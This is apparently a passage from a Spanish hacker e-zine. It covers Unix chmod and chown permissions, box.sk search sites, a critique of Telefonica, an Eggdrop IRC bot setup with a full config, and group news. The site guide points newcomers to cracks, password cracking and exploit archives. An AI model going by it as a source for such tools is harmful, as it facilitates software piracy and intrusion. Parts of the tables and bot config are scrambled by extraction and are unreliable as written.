Figura 7.22: Cambiando permisos utilizando el modo simbolico. En este ejemplo vemos que el archivo de nombre file tiene permiso de lectura para todos los usuarios, pero su due~o es el unico que tiene permiso de escritura. Luego ejecutamos. ==> chmod go-r file En este comando el campo "quienes" esta formado por g (group) y o (others), el operador es "-" por lo tanto se quitaran los permisos especificados, que en este caso es unicamente el permiso de lectura "r" (read). Luego de estos tres campos se debe especificar el/los archivos sobr los que queremos modificar los permisos. Luego de cambiar los permisos, verificamos que el archivo ya no tiene permiso de lectura ni para los usuarios del grupo, ni para los demas. Luego ejecutamos: ==> chmod g=u file Aqui el campo "quienes" contiene solo el grupo. El operador es este caso es "=" por lo que los permisos del grupo seran seteados iguales a los del usuario. Los valores que pueden tomar cada campo de la palabra de control simbolico se muestran en la tabla 7.2. Quienes Operador Permisos ------------------------------------------------------------------------u Usuarios - Eliminar el permiso r Lectura (read) g Grupo + Agregar el permiso w Escritura (write) o Otros = Setear el permiso x Ejecucion (execute) a Todos (all) u Permisos actuales del usuario g Permisos actuales del grupo o Permisos actuales del resto

Tabla 7.2. Formando la palabra de control chmod. MODOS DE ACCESO EN NOTACION OCTAL Muchas personas prefieren especificar los modos de acceso de los archivos utilizando el modo simbolico. Pero el comando chmod tambien nos permite utilizar una especificacion numerica. Aunque uno prefiera utilizar la notacion simbolica es bueno entender la notacion numerica octal de modos de acceso de los archivos en esta notacion. Mas aun si vamos a dedicarnos a la administracion de un sistema, nos encontraremos con la notacion octal muy frecuentemente. Como usuario, podemos encontrar situaciones en las que los comandos mv, cp, ln, rm necesiten confirmacion de las acciones a realizar y nos especifiquen el modo de acceso del archivo en notacion octal. Los numeros del sistema octal, se encuentran en base 8. Lo que significa que los digitos octales son 0, 1, 2, 3, 4, 5, 6 y 7. Cada digito octal es representado por tres digitos binarios (0 o 1), por esto la notacion octal es practica para represntar cosas que se agrupan en trios, ya que solo un digito octal puede representar todas las posibilidades. Un solo digito puede servirnos para representar un conjunto de permisos de lectura/escritura/ejecucion como vemos en la tabla 7.3. Como un digito octal puede guardar un conjunto de permisos, necesitamos tres digitos para representar los modos de acceso de un archivo, un digito para los permisos del usuario, otro para los permisos del grupo y otro para los permisos de los demas usuarios. Una diferencia grande con la utilizacion de la notacion simbolica es que con el modo octal debemos especificar completamente el modo de acceso del archivo y no podemos agregar o quitar permisos. Veamos varios ejemplos en la fihura 7.23. on Digito Octal 0 1 2 3 4 5 6 7 Permiso de lectura no no no no si si si si Permiso de escritura no no si si no no si si Permiso de ejecuci no si no si no si no si

Tabla 7.3: Especificacion de modos de acceso con notacion octal. # chmod 666 file # ls -l file -rw-rw-rw1 tony # chmod 000 file # ls -l file ---------1 tony # chmod 755 file # ls -l file -rwxr-xr-x 1 tony # chmod 700 file # ls -l file -rwx-----1 tony

users users users users

1090 May 29 17:04 file 1090 May 29 17:04 file 1090 May 29 17:04 file 1090 May 29 17:04 file

Figura 7.23: Seteando permisos utilizando la notacion octal.

7.6.3 CAMBIANDO EL DUEO Y EL GRUPO DE LOS ARCHIVOS Los comandos chown (change owner) y chgrp (change group) cambian el due~o y el grupo asociados con un archivo. Estos comandos son usualmente utilizados cuando un usuario hereda archivos de otro usuario o cuando obtiene copias de archivos de otros usuarios. El siguiente comando cambiara el due~o de todos los archivos del directorio actual al usuario juan: ==> chown juan * El nombre del nuevo due~o debe ser un nombre de usuario valido o un numero de identificacion de usuario (UID) valido. Los nombres de usuarios y los respectivos UID's se encuentran en el archivo /etc/passwd. En algunas versiones de UNIX/Linux el comando chown solo esta permitido al superusuario. El siguiente comando asociara el grupo users con el archivo example.tex.gz: ==> chgrp users example.tex.gz Los grupos que se pueden utilizar con el comando chgrp pueden ser nombres de grupos o numeros de identificacion de grupos (GID) que se encuentran en el archivo /etc/group. :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: -:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:..--:: 12.1 Buscando, buscando en la red ::--.. by CHack En los correos que envian a nuestro zine, es comun que se pregunte en donde se pueden encontrar programas o informacion hacker, asi que si tu eres nuevo en el mundo underground y lo que quieres es encontrar (con fines educativos, claro esta) esas cosillas, pues seria importante que conocieras algunos de las paginas favoritas de busqueda de informacion del bajo mundo para lo cual como primera etapa nos dirigiremos a: http://www.boxnetwork.net/ Esta es la pagina principal que te llevara a diversos buscadores de informacion entre los cuales se presentan amigabox, astalavista, blackbox, codebox, dvdbox, easybox, eye, gameguru, linuxbox, mobilebox, mp3box y neworder. Pero bueno, empecemos a describir los contenidos de cada una de las secciones aunque me creo que muchos ya se imaginaran de que tratan cada uno. http://amiga.box.sk/ Ademas del buscador especifico de las computadoras amiga (en mi pais casi extintas) tiene links a diversas paginas donde pueden encontrar desde juegos, software, grupos, archivos de musica, companias que desarrollan cosas para esta maquina, foros, emuladores y muchisimas utilerias, aunque solo tiene relacion con pocas ligas, creo que la informacion es abundante. http://astalavista.box.sk Este motor de busqueda te ayudara a encontrar un gran numero de archivos utiles para PC desde cracks hasta aplicaciones de uso generalizado en la red, desde como descifrar un password hasta phreak, en fin el sue~o de muchos hecho realidad, pero bueno adentremonos en mas de las cosas que tiene el la

box network. http://black.box.sk/ En esta liga vas a encontrar un zine bastante interesante de seguridad informatica y cosas afines, ademas de diversos vinculos a diversas zine principalmente en ingles, pero con bastante informacion; ademas tiene un buscador muy interesante que puede hacer busqueda por palabra especifica dentro de blackbox zine. http://code.box.sk/ Si lo que les interesa es la programacion, pues conectense con esta liga, que tiene un monton de foros, explicaciones y ejemplos de codigo para hacer tus propios programas y muchas cosas mas. http://disc.box.sk/ Este es un lugar con muchos foros de discusion donde se habla de virus, troyanos, TV por satelite, programacion, sistemas operativos, musica, juegos en fin de todos los temas que se relacionan con el mundo de la computacion. http://dvd.box.sk/ Quieres saber de regiones, peliculas, y equipos de DVD, pues acude a esta pagina ya que en ella podras encontrar desde noticias hasta como liberar de regiones hasta DVD caseros. http://easy.box.sk/ Esta es la zona del shareware y freeware asi que si lo que te interesa es encontrar esos programas que luego son tan utilies como el cleanreg, getright o aceleradores de internet, pues aqui los vas a encontrar, aunque yo prefiero ir a www.shareware.com. http://eye.box.sk/ Si lo que te interesa es el dibujo, las fonts o esos plugins para tus programas de dibujo, esta seria la pagina indicada, ademas tiene bastantes manuales que pueden ayudarte a volverte la mejor competencia de lucas arts (bueno, mas o menos). http://gameguru.box.sk/ Cansado de ser la burla de tus porque te matan en la primera escena de los juegos, no sabes como hacerle para terminar con el mounstro del final, aburrido de que tu hermano de 5 a~os te gana en el fifa. Aaaahhh! para eso esta gameguru donde vas a encontrar todos esos trucos que siempre quisiste saber, la forma de ser inmortal (aunque sea en juego), como obtener armas adicionales; o simplemente, la critica de como esta ese juego que en la caja se ve increible, pero cuando lo compras es mas aburrido que bailar con tu hermana. http://linux.box.sk/ Sip, como su nombre lo dice, aqui vas a encontrar muchisimas cosas de linux drivers, juegos, programas, utilerias etc. etc. ademas de un buscador de aplicaciones bastante bueno. http://mobile.box.sk/ Si tienes un telefono celular, visita esta pagina, vas a encontrar muchas respuestas a tus preguntas, pero tampoco esperes mucho, ya que te aseguro que no vas a encontrar el tan buscado generador de codigos para las tarjetas de prepago de telefonia celular. http://mp3.box.sk/ En esta pagina vas a encontrar lo que necesitas para mp3, desde player, encoders, editores etc. alguna vez fue muy bueno para encontrar musica en

sitios FTP, pero ahora ya ha sido rebasado lejos por napster y audiogalaxie. http://neworder.box.sk/ Este sitio debe ser tu primera parada, cuando deseas convertirte en el ZeroCool del proximo milenio, vas a encontrar recursos de seguridad, exploits y otras chunches del mundo de los hacker. Me salte algunas secciones porque creo que no son aplicables al tema (no creo que a mucha gente le interese como encontrar taxis en Cassovia), pero bueno ahora ya tienen por donde empezar. Se que ahora ya tienen un nuevo problema, que es el que ahora tienen mucha informacion, pero ni modo la vida es asi, pues como decia el viejo, si lo dificil fuera facil cualquier pend...tonto lo haria. :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: -:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:..--:: 12.2 Telefonica, quien si no? ::--.. by Portavoz Se~ores, hemos llegado a un momento de pasividad completa y aceptamos toda la basura que nos echan. Damos por sentado que los servicios que se nos ofrecen son los mejores y los mas baratos. No nos molestamos en criticar, tan solo nos tragamos lo que llevamos tragando 40 a~os. Se~ores, YA ESTA BIEN! No podemos seguir aceptando como bueno el pesimo servicio que nos dan. Quiero Hablarles sobre uno de los grandes monopolios que existen en el mundo. Creemos todo lo que nos dicen y todavia estamos contentos. Lo que quiero es descubrir la verdad sobre estas "maravillas" que se nos ofrecen continuamente. Quiero Hablar sobre una empresa que pensamos que es la unica que tiene utilidades adicionales para el usuario comun. Quiero Hablarles sobre algo muy importante: Se~ores, seamos criticos. No podemos dejar que todo lo que nos cuenta esta empresa nos diga lo que es bueno y lo que es malo. Se~ores, tenemos que aprender a analizar las cosas tal y como son. Tenemos que buscarle a esas prestaciones su verdadera utilidad. Por esto quiero Hablarles del mayor monopolio que conoce en este pais. Telefonica de Espa~a S.A. Este es el nombre de la compa~ia que tiene la mayor parte del mercado de las comunicaciones. Telefonica es una poderosa compa~ia que lleva ofreciendo telefono a los espa~oles desde hace mas de 40 a~os. Presumen de ofrecer los mejores servicios y a los mejores precios. Pero, hasta que punto es esto verdad? Si, es cierto que ofrece multitud de servicios: Contestador automatico, llamada en espera, llamada a tres, desvio de llamada, identificacion de llamada... Pero no es oro todo lo que reluce. El contestador automatico: es un servicio muy util, no cabe duda. Pero por que hasta hace bien poco habia que pagar por el? Y mas importante, por que hasta hace tambien muy poco tiempo no se nos informo de como podemos desactivarlo? Porque puede ser un servicio muy util, pero sinceramente, cuantos de ustedes dejan un mensaje en esos aparatos? Por que hay que obligar a quien te llama si no ha podido mantener la conversacion que deseaba? No tiene ningun sentido. Sigamos con la llamada en espera. Este tambien parece un servicio muy util, asi no perdemos las llamadas que nos hagan mientras hablamos. Pero, a ustedes, no les parece una falta de educacion que le retengan una llamada que

usted ha efectuado antes y que ademas siga pagando el coste de esta llamada que esta desperdiciando? Y por si fuera poco, la persona que ha llamada a nuestro interlocutor casi nunca sera bien recibida y se le pedira que cuelgue para nosotros llamarle despues. Eso son otras dos llamadas que hemos tenido que pagar los usuarios del servicio. El siguiente es la llamada a tres. Para que me sirve a mi hablar con dos personas a la vez? Si, por supuesto que puede ser util, pero si ya nos cuesta mantenernos en silencio cuando alguien nos habla, como vamos a hacer para aclararnos tres la vez? Esto no es tan grave, es cuestion de educacion, al fin y al cabo, pero, como se hacen estas llamadas? Porque en ningun sitio se explica. Y cuanto se paga? De eso no se nos informa en ningun momento. Una vez que hemos conseguido realizar las dos llamadas a la vez, no sabemos cuanto estamos pagando. Desvio de llamada. Otro igual que el anterior. Como se desactiva? Yo mismo lo he tenido activado sin mi permiso, y se me decia que era un servicio obligatorio Por el que estaba pagando! Afortunadamente he conseguido desactivar este servicio por el que pagaba 100 pesetas mensuales. Aunque eso si, seguimos pagando la diferencia de la llamada que remitimos a otro telefono. La ultima novedad de Telefonica es la identificacion de llamada. Este es un servicio al que nos hemos acostumbrado con la llegada de la telefonia movil. La utilidad de este servicio es conocer quien no esta llamando antes de descolgar el telefono. No es tan util como parece, ya sabremos quien nos llama cuando descolguemos. Sin embargo, en ocasiones es un servicio que agrada tener. Saber exactamente quien nos llama nos puede servir para rechazar la llamada del pesado que nos gasta bromas o simplemente satisfacer nuestra curiosidad. La trampa en este servicio, gratuito desde hace 2 meses aproximadamente, es que no nos sirven todos los telefonos. Necesitamos uno con pantalla. Pero no todos los que tiene pantalla nos sirven. De hecho los unicos que sirven son los que fabrica Telefonica, que ademas no nos permite tener en alquiler, como los Forma, si no que hay que comprarlo. O tambien podemos comprar, a Telefonica (por supuesto) un aparatito que almacena los 10 ultimos numeros que nos han llamado. No cabe duda de que Telefonica ofrece muchos y variados servicios, pero, a que precio? Son realmente necesarios? Por que no se nos informa de como usarlos? Y todo esto lo hacen aprovechando que son el unico operador real que trabaja en Espa~a: Telefonica, quien si no? Portavoz portavoz@bigfoot.com :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: -:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:..--:: 12.3 IRC Bots - Eggdrops ::--.. by Sicario Vamos a tratar sobre del robot para IRC ms popular, el Eggdrop. Este robot est creado bajo sentencias de C, existiendo versiones tanto para Unix/Linux asi como para el windows, como es de suponer, aqu solo trataremos de la versin para Unix/Linux. Nos basaremos en la version 1.6.3

1.Requerimientos : - Una cuenta Shell, con permisos para compilar y jecutar programas. - Cerciorate de tener el TCL instalado en tu mquina: Utiliza el comando tclsh para cambiar al shell del TCL y verificar si lo tienes instalado. Podras descargar la ltima versin del TCL de ftp://ftp.scriptics.com/pub/tcl El TCL es un lenguaje para crear scripts, desarrollado por John Ousterhout, algunas distribuciones de Linux vienen con el TCL ya instalado. 2.Descarga del Software : Hay muchos lugares de donde puedes descargar el archivo comprimido del Eggdrop. Aqu alguno de ellos : http://www.eggdrops.net/ http://www.eggheads.org/ http://www.egghelp.org/ 3.Instalacin : Una vez descargado, procede a descomprimirlo : #tar -zxvf eggdrop1.6.3.tar.gz Ahora ingresas al directorio del archivo descomprimido : #cd eggdrop1.6.3 y procedes a configurarlo y compilarlo. #./configure #make config #make Con esto ya tienes instalado el eggdrop en tu sistema, ahora tendras que crear un robot con las necesidades que requieras. Lo ideal es tener agrupado los bots que vayas a crear por directorios, en el caso de que vayas a instalar ms de uno. Suponiendoce que nuestro robot se ira a llamar Bot y nuestro home directory sea \home\robot #make install DEST="\home\robot\Bot" Esto creara un directorio dentro de nuestro home llamado Bot, donde tendremos que editar el archivo de configuracin para nuestro robot. Encontraras uno como ejemplo llamado eggdrop.simple.conf. Editalo con tus requerimientos y renombralo para mayor facilidad de uso. A continuacion te pongo un archivo de configuracin, con parametros creados para el servidor de IRC Dalnet : -----#En esta linea configuras la ruta donde se encuentra el binario #del Eggdrop. #! /home/robot/bot/eggdrop #Aqui configuras el Nick del robot y su password en variables #que se utlizan luego. set eggnick "Bot" set botpass "password" #Aqui configuras los datos generales del Bot. set username "Robot" set admin "sicario <sicario@sicario.net>" set network "DALnet"

set timezone "EST" set offset "5" #Si deseas tener logs de tu canal, los configuras aqui. set max-logs 5 set max-logsize 0 set quick-logs 0 logfile mco * "sicario.log" logfile jkp #canal "/home/robot/bot/logs/Bot.log" set log-time 1 set keep-all-logs 0 set switch-logfiles-at 300 set quiet-save 0 set console "mcobxs" #Aqui configuras el nombre del file de usuarios del bot y las #rutas de ayuda, temporales, del MOTD y del banner al hacer #telnet o un dcc chat al robot. set set set set set set userfile "Bot.user" sort-users 1 help-path "help/" temp-path "/tmp" motd "motd" telnet-banner "telnet-banner"

#Aqui configuras los datos de tu bot si estara linkado a #otros bots. set botnet-nick "Bot" listen 4567 all set protect-telnet 1 set dcc-sanitycheck 0 set ident-timeout 6 set require-p 0 set open-telnets 0 set stealth-telnets 0 set use-telnet-banner 1 set connect-timeout 15 set dcc-flood-thr 6 set telnet-flood 5:5 set paranoid-telnet-flood 0 set resolve-timeout 20 ##### MORE ADVANCED STUFF ##### set set set set set set set set set set set set set ignore-time 10 hourly-updates 00 owner "sicario" notify-newusers "sicario" default-flags "hp" whois-fields "url birthday" remote-boots 0 share-unlinks 0 die-on-sighup 0 die-on-sigterm 0 must-be-owner 1 max-dcc 50 dcc-portrange 1024:65535

set enable-simul 1 set allow-dk-cmds 1 #Aqui configuras la ruta de los modulos. Los modulos son #sentencias adicionales en C, que te proporcionan #utilidades fuera del propio eggdrop. set mod-path "modules/" #Aqui levantas el modulo de canales y lo configuras. loadmodule channels set chanfile "bot.chan" set ban-time 300 set exempt-time 60 set invite-time 60 set force-expire 1 set share-greet 0 set use-info 1 #Lo que sigue son los parametros globales para control de #canales. set set set set set set global-flood-chan global-flood-deop global-flood-kick global-flood-join global-flood-ctcp global-chanset { -clearbans +dynamicbans -autoop +greet +statuslog -revenge +autovoice +dontkickops -inactive -shared +userexempts +userinvites 6:6 0 0 0 6:6 -enforcebans +userbans -bitch +protectops -stopnethack -secret +cycle -wasoptest +protectfriends -seen +dynamicexempts +dynamicinvites

set global-chanmode "nt" #Si deseas tener un canal especifico con protecciones distintas #las adicionas a partir de aqui. channel add #canal { chanmode "+nt" idle-kick 0 need-op { needop "#canal" } need-invite { needinvite "#canal" } need-unban { needunban "#canal" } need-key { needinvite "#canal" } need-limit { needinvite "#canal" } flood-chan 6:6 flood-deop 0 flood-kick 0 flood-join 0 flood-ctcp 6:6

} channel channel channel channel set set set set #canal #canal #canal #canal -clearbans -enforcebans +dynamicbans +userbans +userinvites -autoop -bitch +greet +protectops +protectfriends -stopnethack -revenge +autovoice -secret -shared +cycle +dontkickops -wasoptest -inactive -seen +statuslog

#estos son algunos procesos que se ejecutan automaticamente si #el robot necesita Op, necesita ser invitado al canal o #quitarce un ban. proc needop {channelname} { global botnick nick botpass eggnick putserv "PRIVMSG NickServ :identify $eggnick $botpass" putserv "PRIVMSG ChanServ :op $channelname $botnick" } proc needinvite {channelname} { global botnick nick botpass eggnick putserv "PRIVMSG NickServ :identify $eggnick $botpass" putserv "PRIVMSG ChanServ :invite $channelname $botnick" } proc needunban {channelname} { global botnick nick botpass eggnick putserv "PRIVMSG NickServ :identify $botpass" putserv "PRIVMSG ChanServ :unban $channelname all" } #Aqui levantas el modulo de servidor y lo configuras. loadmodule server set net-type 3 set nick "Bot" set altnick "Bot_" set realname "http://home.dal.net/sicario/" set init-server { start } proc start {} { global botnick botpass eggnick putserv "NickServ IDENTIFY $eggnick $botpass" putlog "Identifying to NickServ (Auto-Identification)" putserv "MODE $botnick +iw-xs" } #Aqui configuras la lista de servidores al cual se conectara el #robot. set servers { tsunami.dal.net ced.se.eu.dal.net paranoia.se.eu.dal.net } set keep-nick 1 set use-ison 1 set strict-host 0 set quiet-reject 0 set lowercase-ctcp 0 set answer-ctcp 3 set flood-msg 3:3 set flood-ctcp 3:3 set never-give-up 1 set strict-servernames 0

set set set set set set set set set set set set set

default-port 6669 server-cycle-wait 10 server-timeout 10 servlimit 0 check-stoned 0 use-console-r 1 debug-output 0 serverror-quit 0 max-queue-msg 350 trigger-on-ignore 0 double-mode 1 double-server 1 double-help 1

#Aqui levantas el modulo para CTCP eventos. loadmodule ctcp set ctcp-version "Eggdrop 1.6.3 admin: sicario" set ctcp-finger "Eggdrop 1.6.3 admin: sicario" set ctcp-userinfo "Eggdrop 1.6.3 admin: sicario" set ctcp-mode 2 #Aqui levantas el modulo para IRC. loadmodule irc set bounce-bans 1 set bounce-modes 0 set kick-bogus-bans 0 set bounce-bogus-bans 1 set max-bans 45 set max-modes 45 set allow-desync 1 set kick-bogus 0 set ban-bogus 0 set kick-fun 0 set ban-fun 0 set learn-users 0 set wait-split 600 set wait-info 1 set mode-buf-length 200 set no-chanrec-info 1 set revenge-mode 1 set set set set set set set set set bounce-exempts 0 bounce-invites 0 max-exempts 20 max-invites 20 bounce-bogus-exempts 0 kick-bogus-exempts 0 bounce-bogus-invites 0 kick-bogus-invites 0 prevent-mixing 1

##### TRANSFER MODULE ##### #loadmodule transfer #set max-dloads 2 #set dcc-block 0 #set copy-to-tmp 1 #set xfer-timeout 35

##### SHARE MODULE ##### #loadmodule share #set allow-resync 1 #set resync-time 900 #set private-owner 1 #set private-global 1 #set private-globals "mnot" #set private-user 1 ##### FILESYSTEM MODULE ##### #loadmodule filesys #set files-path "/home/robot/bot/filesys" #set incoming-path "/home/robot/bot/incoming" #set upload-to-pwd 0 #set filedb-path "" #set max-file-users 2 #set max-filesize 700000 ##### NOTES MODULE ##### loadmodule notes set notefile "seafish.notes" set max-notes 5 set note-life 90 set allow-fwd 1 set notify-users 1 set notify-onjoin 1 ##### CONSOLE MODULE ##### loadmodule console set console-autosave 1 set force-channel 0 set info-party 1 ##### WOOBIE MODULE ##### # this serves absolutely no purpose and is for demonstrative # purposes only #loadmodule woobie ##### SEEN MODULE ##### ##### BLOWFISH MODULE ##### checkmodule blowfish ##### ASSOC MODULE ##### # uncomment this line to load assoc support, i.e naming channels on # the botnet #loadmodule assoc ##### WIRE MODULE ##### # this module provides all the standard .wire commands via dcc. # it's an encrypted partyline communication tool, compatible with wire.tcl

# uncomment this line to load it #loadmodule wire #Aqui colocas los scripts que vayas a usar, estos son algunos #ejemplos. Recuerda que los scripts necesitan alguna #configuracion adicional en el eggdrop o en el mismo script, #lee la ayuda de cada script. source source source source source source source scripts/bnc.tcl scripts/randversion.tcl scripts/bseen.tcl scripts/responde.tcl scripts/count.tcl scripts/ping.tcl scripts/chatstats.tcl

--------- End Una vez que hayas terminado de editar el archivo de configuracin, procedes a ejecutar el robot, como esta sera la primera vez, tendras que usar la siguiente linea de comando : #./eggdrop -m conf Suponiendoce que hayas renombrado el archivo eggdrop.simple.conf por conf Una vez que el robot se haya conectado, procedes a enviarle un privado por el IRC, poniendo la siguiente linea : /msg Bot hello El bot te reconocera como su propietario u Owner, procedes a configurar tu clave /msg Bot PASS tuclave Ahora le haces un DCC Chat, pones tu clave y digitas .die , todos los comandos del robot dentro del Chat son precedidos por un . como indicador de comando. Tambien puedes matar el PID del proceso ejecutandoce del Bot. #kill -9 <#PID> Luego de haber echo esto, procedes a ejecutar el robot sin necesidad de poner el parametro -m #./eggdrop conf Aqu te muestro los parametros para ejecucin del bot : -n Ejecuta el robot en modo no background, mostrandote todos los procesos del bot en la terminal de la consola. -nt Ejecuta el robot en modo no background, mostrandote un entorno parecido al ircII. -nc Ejecuta el robot en modo no background, mostrandote informacin del canal cada 10sg. -m Se utiliza la primera vez en la ejecucin de un eggdrop, para crear el archivo de usuarios. -v Solo muestra la version del eggdrop al momento de desconectarce. Niveles de acceso al robot. Los comandos que puedas ejecutar tanto por DCC chat como por MSG, estan

definidos de acuerdo al nivel de acceso que tengas al robot. n (owner) es el creador del robot, el mximo nivel. m (master) tiene acceso a adicionar/eliminar/modificar usuarios en el canal. o (op) d (deop) Puede tener estado de operador en el canal. No puede tener estado de operador en el canal.

k (kick) Un usario con este flag, es automaticamente expulsado del canal. f (friend) Este flag indica estar en la lista de Friends del robot. a (auto-op) El robot da automaticamente el modo de Operador al entrar al canal, siempre en cuando el parametro autoop de la configuracion este +autoop v (auto-voice) El robot da automaticamente el modo de Voice al entrar al canal, siempre en cuando el parametro autovoice de la configuracion este en +autovoice Para visualizar los comandos a los que tienes acceso, solo digita .help Comentarios/sugerencias a sicario@sicario.net :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: -:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:..--:: 13. Noticias CDLR ::--.. Parece mentira que despues de tanto tiempo sin saber de nosotros, no tengamos ninguna noticia provechosa que dar .. xDD Na, en serio, que aunque parezca que estamos dormidos y que pasamos de todo ... la verdad es que estamos tan solo 'algo' dormidos, asi que no te preocupes xD Lo cierto es que ahora mismo Taker anda escribiendo unos advisories y esta en contacto con algun developer para fixear cierto bug que localizo por ahi ... ya veremos cuando el developer toma medidas y se hace publico el tema. Otas cosas mas concretas ... a saber: >--[HACKIT 2002] Que es Hackit? Hackit es la primera CON de Hacking y nuevas tecnologias que se realizara en chile durante el verano del 2002. En ese encuentro se realizaran diversas actividades que van desde charlas hasta foros abiertos donde se discutiran temas de interes. Quienes organizan la HACKIT? En teoria varios grupos dedicados a la seguridad informatica. Entre ellos 0wn3d, EST, 350cc, Underchile, CDLR y pueden ser mas.

Donde se realizara el encuentro? En una primera instancia pensamos en relizar la CON en la V region. Pero por un tema de presupuesto esta se realizara en Santiago en un lugar a confirmarse. Quienes pueden participar en la CON? Cualquier persona que este interesada en el tema , previo pago de la inscripcion correspondiente. La idea es no cerrar las puertas a nadie, estamos interesados en compartir con gente de diferentes sectores y enfoques, eso si se debera guardar la compostura para lo cual habra un equipo de seguridad dentro del evento encargada de mantener el orden. (si querias patearle el trasero a alguien .. lo sentimos pero no sera en la HACKIT) Que actividades se realizaran? Se crearan varios espacios .. la idea es reunir a todos en un salon general donde podras llevar tu tarro. En dicho salon general se realizaran concursos , y podras jugar en red en tus ratos de ocio. Existiran otros espacios para las conferencias y zonas de debates. Existira algun tipo de norma? Si existiran normas generales que se informaran a su debido tiempo. como por ejemplo .. estara prohibido contar tus hazaas en la red a no ser que estes con personas de tu absoluta confianza. Donde puedo estar informado del tema? Estamos levantando el sitio "www.hackit.cl" donde podras hacer una preinscripcion e informarte sobre las ultimas noticias de la CON. >--[RC5] Seguimos dando ca~a al proyecto del RC5, que por cierto tenemos que agradecer a todos los que estan apuntados a nuestro grupo mandando bloques, todos estos: plaxius@xxxx.com u_taker@xxxx.com chack@xxxx.com hackman_cl@xxxx.com net-bit@xxxx.com fcohico@xxxx.com jortiz@xxxx.com.mx follotron@xxxx.com Participant #265,711 kion@xxxx.org mrnexus@xxxx.com rc5proyect@xxxx.net daydalus@xxxx.com Desintegrator0@xxxx.net cd1999@xxxx.net glymar@xxxx.cl Luis Ernesto gualtrapa73@xxxx.com tspspark@xxxx.com hr_cl@xxxx.com elgrillo@xxxx.net punkyx@xxxx.cl franc6@xxxx.com andykhack@xxxx.com bakan@xxxx.cl sslayer@xxxxxx.com

Si todavia no sabes que es esto del RC5, proyecto Bovine, bloques enviados y demas, puedes informarte en http://www.cdlr.org/proyectos.htm donde tambien esta la informacion necesaria para apuntarse a nuestro equipo, el 10377. http://stats.distributed.net/rc5-64/tmsummary.php3?team=10377 >--[MK Linux]

El proyecto de distribucion de cd's de linux sigue adelante con exito, si quieres colaborar con cd's virgenes, haciendo copias, o si necesitas alguna distribucion puedes ponerte en contacto con nosotros en el mail proyecto_r@bigfoot.com y ya veremos que podemos hacer. >--[Cambios en el staff] Varios miembros han dejado el grupo por falta de tiempo y poca dedicacion al mismo. De la misma forma, Evilnet ha ingresado en las filas de CDLR, bienvenido! >--[Seguridad-NT] La lista que tenemos sobre Seguridad en Windows NT sigue en pie. Si quieres subscribirte manda un mail vacio a la siguiente direccion: seguridad-nt-subscribe@yahoogroups.com Deberas confirmar la subscripcion respondiendo el mail que se te enviara desde yahoo y ya estaras dentro. >--[Proyecto_R 12] Bien ... como siempre, la salida del proximo numero depende del numero y calidad de las colaboraciones recibidas. Estamos muy contentos por la cantidad de articulos que nos habeis enviado para este numero 11, y esperamos que la cosa continue asi. Pero que no por enviar muchos articulos se vaya a mermar la calidad, :D Eso si, si quereis enviar algun articulo debeis seguir ciertas reglas basicas: - Sin faltas de ortografia, esto es muy importante, hemos recibido autenticas joyas en cuanto a ortografia se refiere. No se publicara ningun articulo mal escrito, con faltas graves .... Y esto incluye esas chorradas de escribir en mode 31337 ... - Si enviais articulos muy grandes, no los envieis por partes, hacedlo todo de una vez y nosotros seremos los que lo dividamos, o no, en capitulos. - Que sea de calidad, no es comodo decir a alguien que su articulo no cumple unos minimos de calidad, eso debeis reconocerlo vosotros mismos. :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: -:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:..--:: 14. Noticias del mundo del espectaculo ::--.. by CDLR .SET crackeada El website del e-zine hacker mas importante en castellano sufre de un robo de su dominio www.set-ezine.org desde hace ya varias semanas. Se dice por ahi que por una negligencia de networksolutions a la hora de confiar en los faxes que se les envia con cambios en los registros de dominios, ahora el dominio del grupo apunta a una web hospedada en un server gratuito. En esta web se hacen duras criticas contra varios de los miembros del staff de SET, ensa~andose especialmente con uno de ellos.

La noticia no merece mas lineas... Eso no es un hack, ni siquiera un crack,... es un ataque personal. Da igual si es cierto o no, la verdad es que apesta. .Campa~a Anti-LSSI En un movimiento sin precedentes hasta ahora en la Internet espa~ola, y siguiendo la iniciativa de Kriptopolis en contra del anteproyecto de ley conocido como LSSI, que pretende regular los contenidos de la red, miles de internautas estan secundando la campa~a en contra de dicha ley. Realmente resulta esperanzador que todavia la comunidad de internet se movilice por una causa tan justa como es eliminar el anteproyecto de ley LSSI. A estas alturas supongo que no hace falta explicar lo que es, www.kriptopolis.com Todos debemos colaborar, porque a todos nos afecta, ahora ocurre en Espa~a, pero no sabemos donde sera ma~ana .... .Nuevamente Microsoft se pone en el ojo del huracan. Windows XP agrega una nueva caracteristica que podria levarlo nuevamente a problemas judiciales, como los que tuvo con el explorer. La version beta de de este sistema obliga al usuario a adquirir una cuenta del servicio Passport para usar las opciones de mensajero instantaneo y caracteristicas telefonicas. Segun algunos criticos este sistema permitiria establecer un monopolizar las identidades de los usuarios. .IBM respalda linux IBM opina que linux ha producido una revolucion en el mundo de los negocios, y que ahora es el sistema operativo por excelencia que abarca desde grandes corporaciones a peque~as compa~ias. Es por esto que IBM ha decidido dedicar, para este a~o, 1 billon de dolares de su presupuesto anual para investigacion y desarrollo a linux, e invertiran mas de 300 millones de dolares en servicios de linux en los proximos 3 a~os. Podemos ver como IBM ya ha hecho alianzas con algunas de las compa~ias mas grandes de linux en el mundo (RedHat, 